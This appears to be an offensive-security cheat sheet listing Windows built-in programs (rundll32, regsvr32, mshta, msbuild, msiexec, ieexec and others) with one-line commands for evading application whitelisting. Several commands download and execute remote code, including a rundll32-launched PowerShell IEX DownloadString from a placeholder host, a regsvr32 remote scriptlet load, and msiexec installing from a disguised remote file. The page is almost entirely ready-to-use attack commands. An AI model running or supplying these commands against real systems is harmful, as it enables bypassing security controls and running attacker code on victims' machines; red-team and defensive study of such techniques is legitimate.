Skip to content

Applock Bypass

Applock Bypass

Source

Rundll32.exe

Requires admin: ?

rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('[http://ip:port/'](http://ip:port/'));"

rundll32 shell32.dll,Control\_RunDLL payload.dll

Regsvr32.exe

Requires admin: No Bypasses:

regsvr32 /s /n /u /i:[http://example.com/file.sct](http://example.com/file.sct) scrobj.dll

Msbuild.exe

No Admin

msbuild.exe pshell.xml

Regsvcs.exe

Requires admin: ?

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

Regasm.exe

Requires admin: ?

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

Bginfo.exe

Requires admin: No

bginfo.exe bginfo.bgi /popup /nolicprompt

InstallUtil.exe

Requires admin: No

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

MSDT.exe

Requires admin: ?

Open .diagcab package

mshta.exe

Requires admin: No

mshta.exe evilfile.hta

Execute .Bat

Requires admin: No

cmd.exe /k < script.txt

Execute .PS1

Requires admin: No

Get-Content script.txt | iex

Execute .VBS

Requires admin: No

cscript.exe //E:vbscript script.txt

PresentationHost.exe

Requires admin: ?
https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

dfsvc.exe

Requires admin: ?

https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

IEExec.exe

Requires admin: ?

ieexec.exe [http://x.x.x.x:8080/bypass.exe](http://x.x.x.x:8080/bypass.exe)

cdb.exe

Requires admin: ?

cdb.exe -cf x64\_calc.wds -o notepad.exe

dnx.exe

Requires admin: ?

dnx.exe consoleapp

rcsi.exe

Requires admin: ?

rcsi.exe bypass.csx

csi.exe

Requires admin: ?

https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

CPL loading location manipulation

Requires admin: No

Control.exe

msxsl.exe

Requires admin: No

msxsl.exe customers.xml script.xsl

msiexec.exe

Requires admin: ?

msiexec /quiet /i cmd.msi msiexec /q /i [http://192.168.100.3/tmp/cmd.png](http://192.168.100.3/tmp/cmd.png)

cmstp.exe

Requires admin: No

cmstp.exe /ni /s c:\\cmstp\\CorpVPN.inf

xwizard.exe

Requires admin: No

xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll

fsi.exe

Requires admin: No

fsi.exe c:\\folder\\d.fscript

odbcconf.exe

Requires admin: ?

odbcconf -f file.rsp